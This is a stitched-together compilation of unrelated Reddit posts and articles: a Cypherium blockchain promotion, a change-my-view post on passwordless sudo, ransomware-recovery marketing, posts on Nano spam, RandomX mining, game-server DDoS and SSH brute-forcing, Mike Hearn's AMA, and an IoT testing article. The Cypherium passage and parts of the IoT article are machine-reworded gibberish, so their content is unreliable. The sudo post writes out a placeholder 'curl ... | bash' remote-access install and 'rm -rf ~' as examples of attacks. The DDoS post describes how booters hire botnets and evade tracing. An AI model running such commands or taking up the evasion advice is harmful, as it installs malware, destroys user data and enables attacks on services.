As per some revealed epitomes, the validator hubs in the Committee may get exchange demands from other system hubs, for instance, in a P2P organize. The Committee may incorporate at any rate one validator hub that fills in as a "Pioneer" validator hub; the other validator hubs might be alluded to as "Partner" validator hubs. The Leader hub might be changed occasionally, on request, or inconsistently by the individuals from the Committee. At the point when any validator hub gets another exchange demand from a non-validator hub in the system, the exchange solicitation might be sent to the entirety of the validator hubs in the Committee. Further to the unveiled epitomes, the Pioneer hub facilitates with the other Associate validator hubs to arrive at an accord of an attitude (e.g., acknowledge or dismiss) for an exchange square containing the exchange solicitation and communicates the accord to the whole P2P arrange. In the event that the accord is to acknowledge or in any case approve the exchange demand, the mentioned exchange might be included another square of a blockchain that is known to in any event a portion of the system hubs in the system.
In conclusion, CYPHERIUM'S distributed smart-contracts block-chain is ideal for a good number of use cases which include (but not limited to):
Finance
Messaging
Voting
Notarization
Digital Agreements (Contracts)
Secure data storage
A.I (Artificial Intelligence)
IoT (Internet of Things
To know more about CYPHERIUM kindly visit the following links:
WEBSITE: https://cypherium.io/
GITHUB: https://github.com/cypherium
WHITEPAPER: https://github.com/cypherium/patent/blob/maste15224.0003%20-%20FINAL%20Draft%20Application%20(originally%200003%20invention%201)%20single%20chain%20in%20pipeline.pdf
TELEGRAM: https://t.me/cypherium_supergroup
TWITTER: http://twitter.com/cypheriumchain
FACEBOOK: https://www.facebook.com/CypheriumChain/
AUTHOR: Nwali Jennifer
submitted by iphygurl to BlockchainStartups [link] [comments]

CMV: Requiring a password for "sudo" access on desktop Linux systems is nothing but security theater.

Furthermore: on desktop systems it is perfectly fine to put NOPASSWD:ALL in your /etc/sudoers and similar in /etc/polkit-1/rules.d. In fact, I think this should be the default so users do not get a false sense of security.
For clarity, I'm not saying that all accounts should have sudo access, just saying that there's no meaningful security distinction between "sudo access with password" and "sudo access without password", and the "with password" path does nothing but wasting the user's time and giving them a false sense of security.
Argument #1: compromising a user account effectively compromises everything you care about.
As the relevant XKCD says, if your user account is compromised, the attacker cal already do everything he probably cares about. This includes:
Yes, you can run a remote access tool without root. Starting programs at boot does not require root (see systemctl --user, .bashrc, crontab -e, whatever). Internet access does not require root (see: your browser). I frequently see users thinking that remote access kits require root for some reason. Thanks to the X protocol, keylogging does not require root access either on most systems.
The uses for root-level access I can think of is (1) to infect other users of the system, and (2) to install a rootkit infecting your firmware to survive OS reinstallation. The alleged other users do most likely not exist on desktop systems, and only advanced viruses would put rootkits in firmware—viruses with that level of sophistication may as well use the following point to gain root access after compromising an user account.
Argument #2: compromising access to a user account with sudo access effectively compromises root, and a password check won't stop that.
If your account is in the sudoers file, actively used, and an attacker compromises your account, there are a bazillion ways to get access to root. Here are some examples:
Since Linux has made it effectively impossible to use a system without occasional root usage, you will elevate yourself to root at some point, and at that point the attacker will be able to steal said root access one way or another.
Often-heard counterargument: "If you allow sudo without password and leave your computer unattended without locking it, then some passerby may be able to sudo something, but if sudo required a password, he wouldn't have the time to do one of the advanced techniques above."
Reply: targeted attacks can "curl URL_OF_REMOTE_ACCESS_KIT_INSTALLATION_SCRIPT | bash". Random passerby trolls can ruin your day with "rm -rf ~". Both can be typed fairly quickly and neither requires root-level access.
Although I do consider myself a security-focused person, entering my password upon every sudo is still something I consider a waste of keystrokes and a source of security myths. Since the majority of the Linux world seems to disagree with me, I would like to know whether there's something major I'm overlooking.
submitted by ArchaicArchivist to changemyview [link] [comments]

How Ransomware Encryption Happens & 4 Methods for Recovery

We know how overwhelming it can feel to be the victim of a ransomware attack and how your business cannot operate due encrypted or locked files. This page delivers insight on why your files were encrypted or locked, and the options you have to decrypt ransomware. As a ransomware recovery service provider, we have helped thousands of clients successfully recover their data and decrypt their data.
Evaluating all options will include analyzing the encrypted files, and the least desirable option to pay the ransom demand if necessary. Our process helps provide critical insight into decrypting ransomware and the available options that clients have.
By the end of this piece, it is our goal to show you what is involved to successfully recover your files. This guide outlines what steps and research are necessary to decrypt or unlock your files from a ransomware attack.

You’re the victim of a ransomware attack

You arrive to work and start noticing suspicious alerts coming from your servers, and none of the databases are functional. Your co-workers are frantic and cannot access any of their data. You investigate further and find all of the files on your network are renamed and discover ransom notes, and a screen asking you to email someone if you want your data back. You finally realize that you are a victim of a ransomware attack, and all of your files are locked or encrypted.

3 Common Ways Your Files Were Encrypted or Locked

Ransomware succeeds when businesses have poor security hygiene. Organizations that lack policies & procedures around data security will have a higher risk of ransomware attacks. Here are some of the most common ways to fall victim to a ransomware attack:

Open Remote Desktop Protocol Ports (RDP)

Businesses that have improperly configured network security may leave their Remote Desktop Protocol (RDP) ports open. Unknowingly, this is the equivalent of leaving the front door unlocked when you leave your home: it provides an opportunity for cyber attacks to come through with little deterrence.
Once a hacker is connected to your network, they can install ransomware and additional back doors to access your network at a later date. A large percentage of ransomware attacks still use this method of attack because so many organizations are not even aware of this security vulnerability.

Phishing Attacks

Ransomware can infiltrate your network by a malicious email campaign known as a phishing attack. Ransomware operators use massive networks of internet-connected devices (botnets) to send phishing emails to unsuspecting victims. These emails intend to trick the receiver into clicking on a malicious attachment or link, which can secretly install the ransomware virus or other malware.
Phishing emails are becoming increasingly difficult to detect as cybercriminals find clever ways to make a malicious email look legitimate. This underscores the importance of security awareness training for everyone in the organization, not just the I.T. department.

Compromised Passwords

The ransomware operators may have used previously compromised passwords from employees at your organization to gain unauthorized access to the networks. This derives from the poor security practices of reusing the same passwords for multiple accounts and authentication processes.
If your employees have been using old & weak passwords to access your business data, a cyber criminal can use a previously compromised password to initiate the attack. Remember to always to follow good password hygiene.
The variety of attack vectors highlights the importance of a digital forensics investigation that can help victims understand how the ransomware came onto your computer and what steps you can take to remediate the vulnerability.

4 Options for Ransomware Recovery

In this section, we cover the options to restore files encrypted or locked by ransomware.

1. Recover files with a backup

If your files become encrypted in a ransomware attack, check to see if you have backups to restore and recover (in order).

2. Recreate the data

Even though your files are encrypted by ransomware, you might be able to recreate the data from a variety of sources as outlined below:

3. Breaking the ransomware encryption

The harsh truth is that the majority of ransomware encryption is unbreakable. This impossibility is a tough concept for many of us to accept, given the technological advances of our society.
Does this mean you should skip looking into whether the ransomware encryption can be broken? This option should always be explored if presented by a ransomware recovery firm, although the final choice is yours to make. We will lay out a real life example at Proven Data below to outline why this was a great decision for a company that was infected with ransomware.
While it tends to be rare, there are poorly constructed ransomware encryptions that have been broken by security researchers. If you can avoid paying a ransom, you should at all costs.
There can be flaws in the malware or weaknesses in the encryption. Businesses can look at these options, especially if time is on your side. There are also free ransomware decryption resources that provide tools for previously decrypted ransomware variants. A client of ours had hired a ransomware recovery company to recover their files until we discovered at the very last moment through our analysis that the encryption was breakable. With less than 20 minutes to spare, we saved the client out of paying a $450,000 ransom.

Why can’t most ransomware encryption be broken?

Ransomware is a cryptovirus, which means it uses cryptography in combination with malware to lock your files. Modern cryptography uses sophisticated mathematical equations (algorithms) and secret keys to encrypt and decrypt data. If strong encryption is used, it can take thousands, if not millions of years to break the encryption given the strength of today’s computers.
Encryption is a security tool created with the intent of data protection. It is a defensive tool to provide security, privacy, and authentication. Sadly, ransomware attackers are using it as a weapon against innocent victims.

How do I know if the encryption can be broken?

You can start off with this free ransomware identification resource to determine the feasibility of decryption. You will need to upload the ransom note and a sample file into the ID-Ransomware website, and it will tell you if there is a free decrypter or if it is an unknown ransomware variant. Please note that the tool is not always 100% accurate. If the variant is still under analysis, you will need a malware or encryption analyst to determine whether or not there is a possibility for decryption.
Encryption is designed to be unbreakable, which is why security researchers can’t simply make a tool for ransomware decryption. These unbreakable encryptions protect our bank accounts, trade secrets, government data, and mobile communications, among other things. It would be a significant security concern if there were a master decryption tool that could break encryption algorithms.

4. Paying the ransom to decrypt ransomware files

If the encryption is too strong, the only way to obtain the decryption key for your files is to pay the ransom. Many ransomware victims don’t have time on their side because they are facing significant business disruption. Each minute that passes could be a lost client, or worse for a medical organization.
Here is a list of the most prevalent ransomware variants that are known to be “cryptographically secure,” which means that Proven Data or the security community has confirmed the encryption is unbreakable:

I don’t want to pay the hackers ransom.

Businesses and individuals have the option of choosing not to pay the ransom in a ransomware attack to regain access to their files. For personal, political, or moral reasons, there has been resentment of the ransomware economy, and victims do not have to engage in extortion. If paying the ransom is the only option, you should know what to expect before considering moving forward.

How a ransomware recovery specialist can help

If you do decide to use a ransomware recovery company and if there is one thing you get out of this article, it is this: You should always question how a ransomware recovery company is recovering your data. If you are unsure, asking the right questions will ensure a transparent experience:
A ransomware recovery specialist can analyze your current situation and determine what options are available to you at the time of the inquiry. A competent and experienced ransomware recovery company should be able to provide the following:
Understanding how your files were affected by ransomware in the first place will provide you with the insight needed to prevent another attack. Whether you choose Proven Data or another company to decrypt your ransomware files, it’s important to know what unknowns there may be out there.
Our threat intelligence that we’ve gathered from the thousands of previous cases enable you to make informed decisions in helping restore your data after a ransomware attack. If you require a company with such experience, we’re standing by to assist 24/7.
submitted by Proven_Data to u/Proven_Data [link] [comments]

The Solutions to Spam

Spam is an interesting and somewhat unique problem for Nano. For Nano to remain feeless, it needs to penalize malicious actors which spam the network in an attempt to slow or stop the network, but at the same time all transactions must be considered equal because Nano is a permissionless network. This is quite the Catch-22, so how can we solve this dilemma without adding fees on-chain and without making the work requirement burdensome to the average user or service?
Keep in mind there is not one solution to spam. A lot of different things will need to work together to mitigate spam. The current proposed solutions are as follows:
The above methods are the only ones I'm aware that the Nano team is pursuing at this time. Since Dynamic PoW is the only one currently implemented, Nano is vulnerable to spam attacks. This said, here are some additional solutions that can be implemented that would reduce the ability for spammers to saturate the network:
Let me know what you think. I intentionally left some of the multipliers as X for debate, should they by two, three, ten or more times the BASE requirement? What other ways can the spam problem be solved?
submitted by hanzyfranzy to nanocurrency [link] [comments]

Why is the RandomX algorithm being hyped to the moon?

TL;DR: don't assume the average return from mining RandomX will be higher than the current CryptonightR algorithm. Hold back your excitement for now.
I think we all need to bring something to our attention. Over the last month, there have been so many topics and comments here on MoneroMining about the new 'RandomX' algorithm. This algorithm is supposed to be launched a couple of months from now.
There are many questions like "is this a good hashrate for my CPU"? "What's your power usage on RandomX"? "How can I tune my CPU for RandomX"? "How would the algorithm perform on this hardware"? I think these are great constructive comments that are at the heart of what miners stand for. We miners love optimizing our rigs and educating ourselves on technological trends.
But I've noticed many questions such as "what parts should I buy for a RandomX mining rig"? "Is an AMD Ryzen 9 3900x a good investment"? "What parts will give me the most profit when RandomX launches"? Many of these questions are asked with very little research.
I think there's a gold fever brewing behind some of these comments. The kind of motives that have bankrupted many miners in the past bubbles.
As we have seen in 2014 and 2018, anybody who enters the crypto industry with an 'I want easy profit' attitude almost always goes bankrupt. They buy coins or hardware at the peak of the bubble. Sometimes they get lucky and sell their coins or rigs right before the crash (only to get burned in a future bubble later). But most of the time, these new users lose most of their investment.
As a veteran miner, a lot of alarm bells ring in my head when I read these kinds of RandomX hype posts.
I have no reason to think CPU mining will be more profitable on RandomX than on the current CryptonightR.
In the GPU mining community, I have the feeling that there's a lot of resentment over the 2018 crypto recession and the whole 'ASIC miner invasion'. I think people here are feeling burned over their losses last year and the evil ASIC takeover, and want an opportunity for the little guy to start mining again. So we're falsely seeing the RandomX ray of hope as a floodlight, and getting overexcited.
And in general, the ordinary person cannot make a significant, steady profit in the crypto mining industry. The guy who wrote that thread is very rich and even 100 GTX 1080 Ti's cost nothing to him. The reason he became wealthy is because he avoided get-rich-quick gimmicks back in the day (like the dotcom sites) and focused on learning technology for the future. Mining will not make you rich, and especially not RandomX coin tossing.
If you love RandomX, build your rig now, keep benchmarking and undervolting and have fun at it. But if you just want profit, wait until RandomX is up and running. And consider all the risks involved with a new algorithm and commercial mining in general.
So I hope we can all reconsider whether we're excited about RandomX for the right reasons. Let's try to avoid jumping to conclusions about profitability and hold off on the Newegg 'checkout' button. Even though 12 cores at 70 watts sounds awesome. Happy mining!
submitted by Hammereditor to MoneroMining [link] [comments]

Let's talk DDOSing

Hi guys,
I want to open this thread to talk about the biggest problem we are all facing right now in Rainbow Six Siege. DDOS was always in some way a part of R6s, 3-4 seasons back it was quite rare to run across a booter on the enemy team. Now it has gotten so bad that you almost cannot play ranked on console anymore, atleast on high ranks like Platinum to Diamond.
For me personally i'm not even that mad because of booting the servers, on higher ranks you get to know enemy players by name and meeting them over and over across the years, and that just proves that the enemies are bad to the point of hitting the server down, which is satisfying because you know that you won that game.
But nonetheless it's game breaking, and im not trying to defend booting in any way, just my opinion.
Now some big youtubers are responding to the community by making videos to get the devs attention. This has been done over the last year or more, they never really gave their statement to ddosing as far as i know (correct me if im wrong) but they have always been working on stabilising their servers to reduce lag (and probably prevent booting). I'm certainly not a pro in terms of computers and IT, but i know things.
99% of the community says ddossing cannot be stopped. Okay, so Ubisoft does NOT own any server, these are microsoft Azure servers that ubisoft rents to run Rainbow Six (PC, XB & PS4). These servers have a Public IP Adress that can be tracked pretty easily if you have some basic computer knowledge and the right tool. Microsoft servers have securities to prevent attacks, and they have been optimizing security a number of times, but people kept finding new ways to perform attacks, since there are plenty.
*IF you already know and understand what ddos is, please skip this part, but since there are constantly new players on rainbow that report ddosing as server problems because they don't know what it is, i will explain it in easy terms.
So DDOS means Distributed Denial of Service, if i browse a website, my computer constantly exchanges packages with the IP adress of that site, so the site keeps track of what i'm doing and i can browse where i need to be. Now if i had 5000 computers in my room, every computer performing 100 demands on that website, all at the same time, you could imagine what happens. This is what DDOSers do on rainbow Six, via Botnets. Botnets are a large group of "infected" computers, that belong to this Botnet, without knowing so. So the DDOSer on Rainbow buys or gets a suscription for a botnet service which he then gets his acces to, either by a website or a programm like an SSH Telnet client (example: putty). By entering the IP Adress of that game server, he commands every bot that is part of the network to send a huge amount of fake data to that server, completety flooding him with demands, which ends up in crashing the server. In case of "game freezing", the botnet sends a calculated amount of data to barely keep the server going but too much for the server to actually handle other things, like player movement commands ect, that's why the game does not crash but nobody is able to move around.
The most popular Botnets for R6 can have between 50 - 10'000 bots connected, that's why booters feel safe when performing these attacks on MS servers, it can be very hard to define where the source of the attack is located, when 10'000 Computers all across the globe attack your server at once.
As i said earlier, many youtubers are starting to react to the community by making videos explaining the possible consequences to booting servers, talking about federal crimes, 10 years of imprisonnement ect.. What do you guys think, is it to scare the 12 year olds from trying to do these things or could it happen that Ubisoft takes people to court for this.
I mean technically the booter is not damaging anything, he doesn't steal or publish company data, and most of the servers are up and working again 10 minutes after the ddos. If you're a bit clever you will use a anonymous Email Adress for the service, possibly darknet mail, most booters accept bitcoin payments and suggest VPN usage, so i think the amount of work behind tracking down some 12 year old trying to get an advantage in Ranked is going to cost the company a lot of money and time...
I think all they can do is improve the security against these attacks and hope that hackers cannot figure out other efficient ways of stressing the servers.
People are saying why does ubisoft not just have own servers, that will likely never happen, because the costs of running such an infrastructure, with security, server rooms, cooling and Power costs, would never be an option for Ubi.
Feel free to share your knowledge and ideas or questions in this thread.
submitted by Sxzen to Rainbow6 [link] [comments]

Weird attack attempt on my server, should I be worried?

I keep getting random login attempts on my SSH, but what's weird is that they arn't trying very hard or very fast, and they are trying very random usernames, like it seems to me if they were truly brute forcing they would be trying root or my name or things that would be more likely to be valid and not random words/letters. They get blocked for 2 hours after 3 tries by fail2ban, and have about 20 or so IPs that they are rotating through, but the fact that the effort seems so low has me wondering, could this be some kind of byproduct of a bigger attack I'm just not seeing? Like exploiting some kind of vulnerability but it just happens to also trigger those log entries?
This also appears to be targeted, because my SSH is on a non standard port, so it's not just random bots or anything, as I doubt those bother to scan every single port, they just look for port 22 and go for low hanging fruit. I mean I suppose it could be a random attack but it just seems more targeted given they bothered to do a full port scan. I very rarely get login attempts but my phone has been lit up all day. I have 31 blocked IPs as I type this.
I don't see anything else weird though... but I have been getting lot of threatening emails saying my email is hacked and they want bitcoin (it's hosted on that same server) but the passwords they are telling me they used are wrong. Though some of them are my old passwords for other web services that I've since changed. Basically they say they have webcam footage of me watching porn and I don't even have a webcam, nor watch porn. (serious, I'm Christian) But I'm more worried about the idea that they might somehow be getting into my server and are just good at hiding their traces. As far as I know these emails are mostly just scams but do wonder what kind of effort they are actually doing to hack people. I mean if they really do get in and actually do find discriminate info then they have even more ammunition.
Should I be worried? I'd like to think that I run a rather tight ship, but I'm no security expert especially when it comes to the more advanced hacking like where they can send specially formatted packets that start to do all sorts of weird stuff. Like looking for 0-day exploits etc. I understand there's way more to security then just having a good firewall and brute force protection and strong passwords and all that. Real hacking actually bypasses all of that completely by finding a flaw in the firewall, software, etc.
Also one log entry kinda weirded me out, I forget the exact line, but it was basically a disconnection notice, but the IP was nowhere else! Normally the client connects, tries to login, fails, disconnects so you see the IP show up for those actions. But this particular entry was just a disconnection, and that's it. I even did a grep search for the IP address in case it was very far up in the log or something but did not find anything. How would this happen? I tested what happens if I just telnet to the port and disconnect, but I get a different message.
EDIT / May 8 2019: Changed the SSH port last night (over 24h ago) and the attacks stopped... obviously not a "fix" but it's nice to see the logs being quiet again... It also makes it slightly more plausible that it may very well be automated and not targeted. If it was targeted they would have found the new port by now.
I of course need to start looking at more serious mitigation for these sort of attacks. While fail2ban was doing it's job, I don't have a way of knowing if this attack was something bigger, like trying to exploit SSHD in a weird way or if this was some kind of distraction technique while they attack something else etc.
EDIT / May 20 2019: So no attacks so far after changing port. At one point I changed it back for fun and the attacks started immediately. This is very strange, as by now you'd think they would have scanned me and tried to find the new port, but they're still trying the old one. Starting to think it's a very low effort attack, maybe someone stuck a botnet against me and just left it as is. Who knows. Seems too odd for it to be random. Server has been up for years, why did it only start now? Anyway I'm not really worried anymore. I may also play around with adding more logging/honeypot related stuff on my server so I can block stuff before they even get a chance to try anything.
submitted by RedSquirrelFtw to security [link] [comments]

AMA: Ask Mike Anything

Hello again. It's been a while.
People have been emailing me about once a week or so for the last year to ask if I'm coming back to Bitcoin now that Bitcoin Cash exists. And a couple of weeks ago I was summoned on a thread called "Ask Mike Hearn Anything", but that was nothing to do with me and I was on holiday in Japan at the time. So I figured I should just answer all the different questions and answers in one place rather than keep doing it individually over email.
Firstly, thanks for the kind words on this sub. I don't take part anymore but I still visit occasionally to see what people are talking about, and the people posting nice messages is a pleasant change from three years ago.
Secondly, who am I? Some new Bitcoiners might not know.
I am Satoshi.
Just kidding. I'm not Satoshi. I was a Bitcoin developer for about five years, from 2010-2015. I was also one of the first Bitcoin users, sending my first coins in April 2009 (to SN), about 4 months after the genesis block. I worked on various things:
You can see a trend here - I was always interested in developing peer to peer decentralised applications that used Bitcoin.
But what I'm best known for is my role in the block size debate/civil war, documented by Nathaniel Popper in the New York Times. I spent most of 2015 writing extensively about why various proposals from the small-block/Blockstream faction weren't going to work (e.g. on replace by fee, lightning network, what would occur if no hard fork happened, soft forks, scaling conferences etc). After Blockstream successfully took over Bitcoin Core and expelled anyone who opposed them, Gavin and I forked Bitcoin Core to create Bitcoin XT, the first alternative node implementation to gain any serious usage. The creation of XT led to the imposition of censorship across all Bitcoin discussion forums and news outlets, resulted in the creation of this sub, and Core supporters paid a botnet operator to force XT nodes offline with DDoS attacks. They also convinced the miners and wider community to do nothing for years, resulting in the eventual overload of the main network.
I left the project at the start of 2016, documenting my reasons and what I expected to happen in my final essay on Bitcoin in which I said I considered it a failed experiment. Along with the article in the New York Times this pierced the censorship, made the wider world aware of what was going on, and thus my last gift to the community was a 20% drop in price (it soon recovered).

The last two years

Left Bitcoin ... but not decentralisation. After all that went down I started a new project called Corda. You can think of Corda as Bitcoin++, but modified for industrial use cases where a decentralised p2p database is more immediately useful than a new coin.
Corda incorporates many ideas I had back when I was working on Bitcoin but couldn't implement due to lack of time, resources, because of ideological wars or because they were too technically radical for the community. So even though it's doesn't provide a new cryptocurrency out of the box, it might be interesting for the Bitcoin Cash community to study anyway. By resigning myself to Bitcoin's fate and joining R3 I could go back to the drawing board and design with a lot more freedom, creating something inspired by Bitcoin's protocol but incorporating all the experience we gained writing Bitcoin apps over the years.
The most common question I'm asked is whether I'd come back and work on Bitcoin again. The obvious followup question is - come back and work on what? If you want to see some of the ideas I'd have been exploring if things had worked out differently, go read the Corda tech white paper. Here's a few of the things it might be worth asking about:
I don't plan on returning to Bitcoin but if you'd like to know what sort of things I'd have been researching or doing, ask about these things.
edit: Richard pointed out some essays he wrote that might be useful, Enterprise blockchains for cryptocurrency experts and New to Corda? Start here!
submitted by mike_hearn to btc [link] [comments]

IoT Testing !!!

IoT is a whole ecosystem that contains intelligent devices equipped with sensors (sensors) that provide remote control, storage, transmission and security of data. The Internet of Things (IoT) is an innovative solution in various areas such as healthcare, insurance, labor protection, logistics, ecology, etc. To unleash the full potential of using IoT devices, it is necessary to solve many problems related to standards, security, architecture, ecosystem construction, channels and device connection protocols. Today in the world, large organizations such as NIST, IEEE, ISO / IEC, and others make enormous efforts in addressing the issues of standardization, security, and the architecture of developed devices. Analysis of recent scientific research in the field of solving information security issues and data privacy of IoT devices showed positive results, but these methods and approaches are based on traditional methods of network security. The development and application of security mechanisms for IoT devices is a complex and heterogeneous task. In this regard, ensuring information security and the protection of sensitive data, as well as the availability of IoT devices, is the main purpose of writing this article. Given the above, many questions arise related to the security status of IoT devices, namely: What are the current standards and protocols for IoT? What are the requirements for ensuring information security of IoT devices? What security mechanisms do IoT devices have? What methods of testing IoT devices exist? Manufacturers and developers of IoT devices do not pay enough attention to security issues. With the development of cyber-attacks, attack vectors are becoming more sophisticated and aimed at several infrastructure elements at the same time. IoT infrastructure typically includes millions of connected objects and devices that store and share confidential information. Scenarios of theft and fraud, such as hacking and falsifying personal data, pose a serious threat to such IoT devices. Most IoT devices use the public Internet to exchange data, which makes them vulnerable to cyber-attacks. Modern approaches to information security often offer solutions to individual problems, when multi-level approaches offer increased resistance to cyber-attacks.
Challenges of testing IoT devices
To a request to name essential items, many would answer: food, a roof over your head, clothes … With one caveat: this was the case in the last century.
Since then, the species Homo Sapiens has accumulated needs. We need automatic sensors to control the lighting, not just switches, for smart systems to monitor health and car traffic. The list goes on … In general, we can make life easier and better.
Let’s try to figure out how all this Internet of things works before moving on to testing.
IoT testing
Content
What is the Internet of Things (IoT)? Examples of IoT devices # 1) Wearable technology: # 2) Infrastructure and development # 3) Health Technologies that are present in IoT IoT Testing # 1) Usability: # 2) IoT Security: # 3) Network features: # 4) Efficiency: # 5) Compatibility testing: # 6) Pilot testing: # 7) Check for compliance: # 8) Testing updates: IoT testing challenges # 1) Hard / soft # 2) Device Interaction Model # 3) Testing data coming in real time # 4) UI # 5) Network Availability IoT Testing Tools # 1) Software: # 2) Hard: Total What is the Internet of Things (IoT)? The Internet of things (or IoT) is a network that combines many objects: vehicles, home automation, medical equipment, microchips, etc. All these constituent elements accumulate and transmit data. Through this technology, the user controls the devices remotely.

Examples of IoT devices

# 1) Wearable technology: Fitbit Fitness Bracelets and Apple Watch smart watches sync seamlessly with other mobile devices.

IoT – watches and bracelets

Itís easier to collect health information: heart rate, body activity during sleep, etc.
# 2) Infrastructure and development The CitySense app analyzes lighting data online and turns lights on and off automatically. There are applications that control traffic lights or report on the availability of parking lots.
# 3) Health Some health monitoring systems are used in hospitals. The basis of their work is indicative data. These services control the dosage of drugs at different times of the day. For example, the UroSense application monitors the level of fluid in the body and, if necessary, increases this level. And doctors will learn about patient information wirelessly.
Technologies that are present in IoT RFID (Radio Frequency Identification), EPC (Electronic Product Code) NFC (ìNear Field Communicationî) provides two-way communication between devices. This technology is present in smartphones and is used for contactless transactions.
Bluetooth It is widely used in situations where near-field communication is sufficient. Most often present in wearable devices. Z-Wave. Low frequency RF technology. Most often used for home automation, lighting control, etc. WiFi. The most popular network for IoT (file, data and message transfer). IoT Testing Consider an example : a medical system that monitors health status, heart rate, fluid content, and sends reports to healthcare providers. Data is displayed in the system; archives available. And doctors are already deciding whether to take medication for the patient remotely.
IoT architecture
There are several approaches for testing the IoT architecture.
# 1) Usability: It is necessary to provide usability testing of each device. A medical device that monitors your health should be portable.
Sufficiently thought out equipment is needed that would send not only notifications, but also error messages, warnings, etc. The system must have an option that captures events, so that the end user understands. If this is not possible, event information is stored in the database. The ability to process data and exchange tasks between devices is carefully checked. # 2) IoT Security: Data is at the heart of all connected devices. Therefore, unauthorized access during data transfer is not ruled out. From the point of view of software testing, it is necessary to check how secure / encrypted the data is. If there is a UI, you need to check if it is password protected. # 3) Network features: Network connectivity and IoT functionality are critical. After all, we are talking about a system that is used for health purposes. Two main aspects are tested: The presence of a network , the possibility of data transfer (whether jobs are transferred from one device to another without any hitch). The scenario when there is no connection . Regardless of the level of reliability of the system, it is likely that the status of the system will be ìofflineî. If the network is unavailable, employees of the hospital or other organization need to know about it (notifications). Thus, they will be able to monitor the condition of the patient themselves, and not wait for the system to work. On the other hand, in such systems there is usually a mechanism that saves data if the system is offline. That is, data loss is eliminated. # 4) Efficiency: It is necessary to take into account the extent to which the healthcare solution is applicable in specific conditions. In testing, from 2 to 10 patients participate, data is transmitted to 10-20 devices. If the entire hospital is connected to the network, this is already 180-200 patients. That is, there will be more actual data than test data. In addition, it is necessary to test the utility for monitoring the system: current load, power consumption, temperature, etc. # 5) Compatibility testing: This item is always present in the plan for testing the IoT system. The compatibility of different versions of operating systems, browser types and their respective versions, devices of different generations, communication modes [for example, Bluetooth 2.0, 3.0] is extremely important for IoT. # 6) Pilot testing: Pilot testing is a mandatory point of the test plan. Only tests in the laboratory will allow us to conclude that the system is functional. In pilot testing, the number of users is limited. They make manipulations with the application and express their opinion. These comments turn out to be very helpful, they make a reliable application. # 7) Check for compliance: The system, which monitors the state of health, undergoes many compliance checks. It also happens that a software product passes all stages of testing, but fails the final test for compliance [testing is carried out by the regulatory body]. It is more advisable to check for compliance with norms and standards before starting the development cycle. # 8) Testing updates: IoT is a combination of many protocols, devices, operating systems, firmware, hardware, network layers, etc. When an update occurs – be it a system or something else of the above – rigorous regression testing is required. The overall strategy is being amended to avoid the difficulties associated with the upgrade.

IoT testing challengesIoT testing

# 1) Hard / soft IoT is an architecture in which software and hardware components are closely intertwined. Not only software is important, but also hard: sensors, gateways, etc.
Functional testing alone will not be enough to certify the system. All components are interdependent. IoT is much more complicated than simpler systems [only software or only hard].
# 2) Device Interaction Model Components of the network must interact in real time or close to real. All this becomes a single whole – hence the additional difficulties associated with IoT (security, backward compatibility and updates).
# 3) Testing data coming in real time Obtaining this data is extremely difficult. The matter is complicated by the fact that the system, as in the described case, may relate to the health sector.
# 4) UI An IoT network usually consists of different devices that are controlled by different platforms [iOS, Android, Windows, linux]. Testing is possible only on some devices, since testing on all possible devices is almost impossible.
# 5) Network Availability Network connectivity plays an important role in IoT. The data rate is increasing. IoT architecture should be tested under various connection conditions, at different speeds. Virtual network emulators in most cases are used to diversify network load, connectivity, stability, and other elements of load testing . But the evidence is always new scenarios, and the testing team does not know where the difficulties will arise in the future.

IoT Testing ToolsIoT and software

There are many tools that are used in testing IoT systems.
They are classified depending on the purpose:
# 1) Software: Wireshark : An open source tool. Used to monitor traffic in the interface, source / given host address, etc. Tcpdump : This tool does a similar job. The utility does not have a GUI, its interface is the command line. It enables the user to flash TCP / IP and other packets that are transmitted over the network. # 2) Hard: JTAG Dongle: A tool similar to debuggers in PC applications. Allows you to find defects in the code of the target platform and shows the changes step by step. Digital Storage Oscilloscope : checks various events using time stamps, power outages, signal integrity. Software Defined Radio : emulates a transmitter and receiver for various wireless gateways. IoT is an emerging market and many opportunities. In the foreseeable future, the Internet of things will become one of the main areas of work for tester teams. Network devices, smart gadget applications, communication modules – all this plays an important role in the study and evaluation of various services.
Total The approach to testing IoT may vary depending on the specific system / architecture.
Itís difficult to test IoT, but at the same time itís an interesting job, since testers have a good place to swing – there are many devices, protocols and operating systems.
PS You should try out the TAAS format (“tests from the user’s point of view”), and not just fulfill the formal requirements.
—————
Smart watches, baby-sitters, wireless gadgets and devices such as, for example, a portable radio station have long been part of everyday life.
Hackers have already proven that many of these attacks on IoT are possible.
Many people in general first learned about IoT security threats when they heard about the Mirai botnet in September 2016.
According to some estimates, Mirai infected about 2.5 million IoT devices, including printers, routers and cameras connected to the Internet.
The botnetís creators used it to launch distributed denial of service (DDoS) attacks, including an attack on the KrebsonSecurity cybersecurity blog.
In fact, the attackers used all devices infected with Mirai to try to connect to the target site at the same time, in the hope of suppressing the servers and preventing access to the site.
Since Mirai was first published on the news, attackers launched other botnet attacks on IoT, including Reaper and Hajime.
Experts say that such attacks are most likely in the future.
The Internet of Things (IoT) can bring many advantages to modern life, but it also has one huge drawback: security threats.
In its 2018 IOT forecasts, Forroter Research notes: ìSecurity threats are a major concern for companies deploying IoT solutions – in fact, this is the main task of organizations looking to deploy IoT solutions.
However, most firms do not regularly prevent IoT-specific security threats, and business pressure suppresses technical security issues. î
IoT security risks can be even more significant on the consumer side, where people are often unaware of potential threats and what they should do to avoid threats.
A 2017 IoT security survey sponsored by Gemalto Security Provider found that only 14 percent of consumers surveyed consider themselves IoT-aware.
This number is particularly noteworthy because 54 percent of the respondents owned an average of four IoT devices.
And these IoT security threats are not just theoretical.
Hackers and cybercriminals have already found ways to compromise many IoT devices and networks, and experts say that successful attacks are likely to increase.
Forrester predicted: “In 2018, we will see more attacks related to IoT … except that they will increase in scale and loss.”
What types of IoT security threats will enterprises and consumers face in 2018?
Based on historical precedent, here are ten of the most likely types of attacks.
  1. Botnets and DDoS attacks
  2. Remote recording The possibility that attackers can hack IoT devices and record owners without their knowledge is not revealed as a result of the work of hackers, but as a result of the work of the Central Intelligence Agency (CIA).
Documents released by WikiLeaks implied that the spy agency knew about dozens of zero-day exploits for IoT devices, but did not disclose errors, because they hoped to use vulnerabilities to secretly record conversations that would reveal the actions of alleged opponents of America.
Documents pointed to vulnerabilities in smart TVs, as well as on Android and iOS smartphones.
The obvious consequence is that criminals can also exploit these vulnerabilities for their vile purposes.
  1. Spam In January 2014, one of the first known attacks using IoT devices used more than 100,000 Internet-connected devices, including televisions, routers, and at least one smart refrigerator to send 300,000 spam emails per day.
